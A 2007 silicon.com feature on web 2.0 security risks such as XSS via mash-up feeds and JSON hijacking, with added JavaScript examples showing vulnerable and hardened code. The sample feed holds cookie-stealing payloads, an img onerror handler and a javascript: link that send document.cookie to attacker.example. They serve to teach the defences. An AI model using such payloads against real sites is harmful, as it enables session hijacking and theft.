This story was printed from silicon.com, located at http://www.silicon.com/
Story URL: http://www.silicon.com/research/specialreports/digitaldefences/0,3800014341,39169267,00.htm
Web 2.0 threat looms
So what can organisations do about it?
By Anthony Plewes
Published: Monday 26 November 2007
The web is already the main target for security attacks. Now the functionality of dynamic web 2.0 applications is providing new ways to compromise machines. Anthony Plewes looks at the vulnerabilities and the possible fixes.
Most analysts agree careless use of web 2.0 applications poses a serious threat to computer users. The Yankee Group, for example, last month said web 2.0 is heading for a slow-motion security train wreck.
The analyst firm warns web 2.0 applications could herald widespread identity theft and transaction fraud, give malware a new infection super highway, erode social networks and eventually create a total consumer loss of confidence in the web platform.
Most security threats that affect web 2.0 are not new. They stem from issues with browser design and web architecture that did not anticipate how the web would be used in the future.
Existing vulnerabilities in browsers and in plug-ins such as Java can allow attackers to compromise users' machines with malware and to access confidential information.
Jacob West, manager of the research group at security specialist Fortify Software, said: "Interactive and dynamic web 2.0 applications push content to the client instead of generating static pages on a server. The net effect is that there is a lot more data moving back and forth and a lot more processing taking place on the client."
"The security in the web has always been poor but the proliferation of personal information now available online means that the internet offers low-hanging fruit for criminals," West added.
Mash-ups, for example, pull different sources of information into a single dynamic web page using simple protocols such as Atom and RSS. Mash-ups are powerful because they allow companies to combine internal information with external sources, such as maps or public statistics.
They can, however, be a major security headache if the third-party source is compromised, because the mash-up will import whatever the RSS or Atom feed now carries. If feed content is rendered into the page without being escaped, that can include JavaScript, which then runs in the user's browser with the same privileges as the mash-up page itself - giving criminals a whole range of new hosts from which to steal session data or load further malware.
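The failure mode above, as an added example (not code from the article or from any product it mentions): a mash-up widget that renders items from a feed it does not control. The feed, the attacker domain and the item fields are constructed for illustration, and the feed parser is a minimal regex extractor for this sample, not a general XML parser. The point is the difference between interpolating feed text straight into HTML and treating it as untrusted data.

```javascript
// Constructed sample feed: item 2 is what a compromised source might serve.
const SAMPLE_FEED = `<?xml version="1.0"?>
<rss version="2.0"><channel>
  <item>
    <title>Quarterly numbers</title>
    <link>https://example.org/q3</link>
    <description>Revenue up 4% &amp; costs flat.</description>
  </item>
  <item>
    <title>Read me</title>
    <link>javascript:fetch('https://attacker.example/?c='+document.cookie)</link>
    <description><![CDATA[<img src=x onerror="new Image().src='https://attacker.example/?c='+document.cookie">]]></description>
  </item>
</channel></rss>`;

// Undo CDATA wrapping or the five predefined XML entities (enough for this sample).
function decodeXmlText(s) {
  const cdata = s.match(/^<!\[CDATA\[([\s\S]*)\]\]>$/);
  if (cdata) return cdata[1];
  return s.replace(/&lt;/g, '<').replace(/&gt;/g, '>').replace(/&quot;/g, '"')
          .replace(/&apos;/g, "'").replace(/&amp;/g, '&');
}

// Pull title/link/description out of each <item> (regex-based, sample only).
function parseFeedItems(xml) {
  const items = [];
  const itemRe = /<item>([\s\S]*?)<\/item>/g;
  let m;
  while ((m = itemRe.exec(xml)) !== null) {
    const body = m[1];
    const field = (name) => {
      const f = body.match(new RegExp(`<${name}>([\\s\\S]*?)<\\/${name}>`));
      return f ? decodeXmlText(f[1].trim()) : '';
    };
    items.push({ title: field('title'), link: field('link'), description: field('description') });
  }
  return items;
}

// Vulnerable renderer: feed text goes into the page verbatim. The onerror
// handler and the javascript: link both execute in the mash-up's origin.
function renderItemUnsafe(item) {
  return `<li><a href="${item.link}">${item.title}</a><p>${item.description}</p></li>`;
}

// Hardened renderer: every feed string is HTML-escaped, and links are
// restricted to http(s) so a javascript: URL cannot become a clickable script.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function safeHref(url) {
  try {
    const u = new URL(url);
    if (u.protocol === 'http:' || u.protocol === 'https:') return u.href;
  } catch (_) { /* unparseable: fall through */ }
  return '#';
}
function renderItemSafe(item) {
  return `<li><a href="${escapeHtml(safeHref(item.link))}">${escapeHtml(item.title)}</a>` +
         `<p>${escapeHtml(item.description)}</p></li>`;
}

// Check used below: does the rendered HTML contain a real tag with a script
// body, an on* event handler, or a javascript: href? Escaped text has no
// '<', so it never matches.
function containsActiveContent(html) {
  return /<script\b|<\w+[^>]*\son\w+\s*=|href\s*=\s*["']?\s*javascript:/i.test(html);
}

const items = parseFeedItems(SAMPLE_FEED);
console.log(renderItemUnsafe(items[1])); // live <img onerror> and javascript: link
console.log(renderItemSafe(items[1]));   // inert text, href="#"
```

Escaping everything turns legitimate HTML in feed descriptions (links, emphasis) into visible markup; if the widget must keep that HTML, run it through a maintained sanitiser such as DOMPurify rather than a hand-written tag allowlist, and still apply the scheme check to every href.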
All computers at risk
Because web 2.0 applications run in browsers, all users, regardless of computer platform, are at risk. Mike Smart, European product manager at Secure Computing, said: "The browser has become like another operating system."
"It sits in the host operating system and like a virtual machine can run its applications independently. This allows people to communicate with a huge audience as long as they have a browser and plug-ins that can be downloaded automatically," Smart added.
Web application vulnerabilities such as cross-site scripting (XSS) have the potential to become as prolific as the buffer overflow was 10 years ago. Because XSS lets an attacker run script in the user's browser with the privileges of the vulnerable site, the possibilities are wide open: attackers can hijack a web session, deface what the user sees on a site or use the page to deliver malware.
XSS is one of the top 10 web application vulnerabilities identified by the Open Web Application Security Project (OWASP), along with injection attacks and malicious file execution.
Earlier this year, Fortify Software undertook some research into the security implications of web 2.0 and described the JavaScript hijacking vulnerability. Essentially, a malicious page includes a script tag that points at another site's data URL; the browser attaches the user's active session cookie to that request, and if the response is a valid JavaScript program - a bare JSON array, for example - the malicious page can read it.
In effect, the attacker is using the same cross-site script inclusion that mash-ups rely on to impersonate the victim to a third-party server. Alarmingly, this could let an attacker read data that an internet banking site returns to its own pages in this form, using the victim's own credentials. This is not just a theoretical threat: the technique has already been used against Gmail to fraudulently download users' contact lists.
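The server-side defences against this, as an added example that is not from the article or from Fortify's paper. It models the endpoint and the two kinds of request without a network: the contact list, session token and request objects are constructed for illustration, and the handler and client functions are hypothetical names. The original capture relied on browser behaviour of the time (overriding the Array constructor or property setters so that evaluating the array literal leaked its contents); modern engines no longer invoke those for literals, so what the example shows is why a bare array is readable by a script include and how an endpoint stops being one.

```javascript
// Constructed data the endpoint guards.
const CONTACTS = [
  { name: 'Alice', email: 'alice@example.org' },
  { name: 'Bob',   email: 'bob@example.org' },
];
const SESSION_COOKIE = 'sid=abc123'; // assumed session token

// Vulnerable handler: any GET carrying the session cookie gets the contacts
// back as a bare JSON array. A hostile page can load this URL with
// <script src="https://mail.example/contacts">; the browser sends the cookie,
// and the body is a complete, valid JavaScript program (an array expression).
function vulnerableHandler(req) {
  if (req.cookie !== SESSION_COOKIE) return { status: 401, body: '' };
  return { status: 200, body: JSON.stringify(CONTACTS) };
}

// Hardened handler, two independent controls:
//  1. require a request header that only same-origin XMLHttpRequest/fetch
//     code can set; a <script> include cannot add headers;
//  2. prefix the body so it is a syntax error as a script, so even if the
//     response reaches a <script> tag nothing is evaluated.
const JSON_PREFIX = ")]}',\n";
function hardenedHandler(req) {
  if (req.cookie !== SESSION_COOKIE) return { status: 401, body: '' };
  if (req.headers['x-requested-with'] !== 'XMLHttpRequest') return { status: 403, body: '' };
  return { status: 200, body: JSON_PREFIX + JSON.stringify(CONTACTS) };
}

// Legitimate same-origin client: strip the prefix, then parse as data.
function parseGuardedJson(body) {
  if (!body.startsWith(JSON_PREFIX)) throw new Error('missing anti-hijacking prefix');
  return JSON.parse(body.slice(JSON_PREFIX.length));
}

// Would this body run if pulled in via <script src>? Compiling it as a
// function body is the same check the engine makes before executing it.
function compilesAsScript(body) {
  try { new Function(body); return true; } catch (_) { return false; }
}

// Constructed requests: what the browser sends in each case. Both carry the
// cookie; only the same-origin XHR can add the custom header.
const crossSiteScriptRequest = { method: 'GET', cookie: SESSION_COOKIE, headers: {} };
const sameOriginXhrRequest = {
  method: 'GET', cookie: SESSION_COOKIE, headers: { 'x-requested-with': 'XMLHttpRequest' },
};

console.log(vulnerableHandler(crossSiteScriptRequest).status,                    // 200
            compilesAsScript(vulnerableHandler(crossSiteScriptRequest).body));   // true
console.log(hardenedHandler(crossSiteScriptRequest).status);                     // 403
const ok = hardenedHandler(sameOriginXhrRequest);
console.log(ok.status, compilesAsScript(ok.body), parseGuardedJson(ok.body).length); // 200 false 2
```

Requiring POST for data endpoints (a script tag can only GET) or a per-session anti-CSRF token in the request are equivalent forms of control 1; Google's own services have shipped control 2 with both a `while(1);` and a `)]}'` prefix.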
Trusted sources
The core of many of these problems is that the user is downloading and executing third-party code from what the application designer or user believes is a trusted source.
One fix to this problem is to analyse any code downloaded to the machine to see if it is malicious. This is not as easy as it sounds, because most threats facing users are so-called zero-hour attacks for which no signature exists yet.
But there are ways of identifying the intention of executable code, for instance by watching whether it tries to do something unexpected, such as set up a network connection.
Many website owners are simply unaware they are hosting drive-by malware that can infect users who surf their site or pull its content in through web feeds. Web search giant Google estimated in May 2007 that as many as one in 10 of the web pages it examined was serving malware in this way.
Much of the new generation of targeted malware is designed to extract valuable user data that can be used for profit, such as financial information or identity theft. But not all of this data leakage is caused by malware infection.
In some cases, the user volunteers this information quite willingly. For example, information may be inadvertently posted on blogs to a wider audience, or simply emailed to the wrong person.
The greater use of social networking and user-generated content by people inside organisations puts confidential corporate information under serious threat.
Taking action
Although most enterprises are concerned about the security implications of web 2.0 applications, few have taken adequate steps to protect themselves.
A September 2007 survey from analyst firm Forrester, found there were significant concerns in enterprises about the potential of web 2.0 to distribute malware and leak data from the organisation.
Organisations are right to be worried: three-quarters of them had a virus infection within the past 12 months despite the widespread use of URL filtering and antivirus signature scanning. With only a quarter of companies using newer malware-fighting techniques, such as behavioural analysis, many of these infections are likely to be the direct result of zero-day attacks that are invisible to signature-based protection.
Companies need to update their entire approach to security to cope with the threats posed by web 2.0. Forrester recommends three steps:
The web has become the next key security battleground as computer criminals take advantage of the ubiquity of browsers.
Ultimately browser technology needs to be more secure. But in the meantime, businesses and individuals need to beef up their own security measures to deal with this new world.
Copyright © 2008 CBS Interactive Limited. All rights reserved.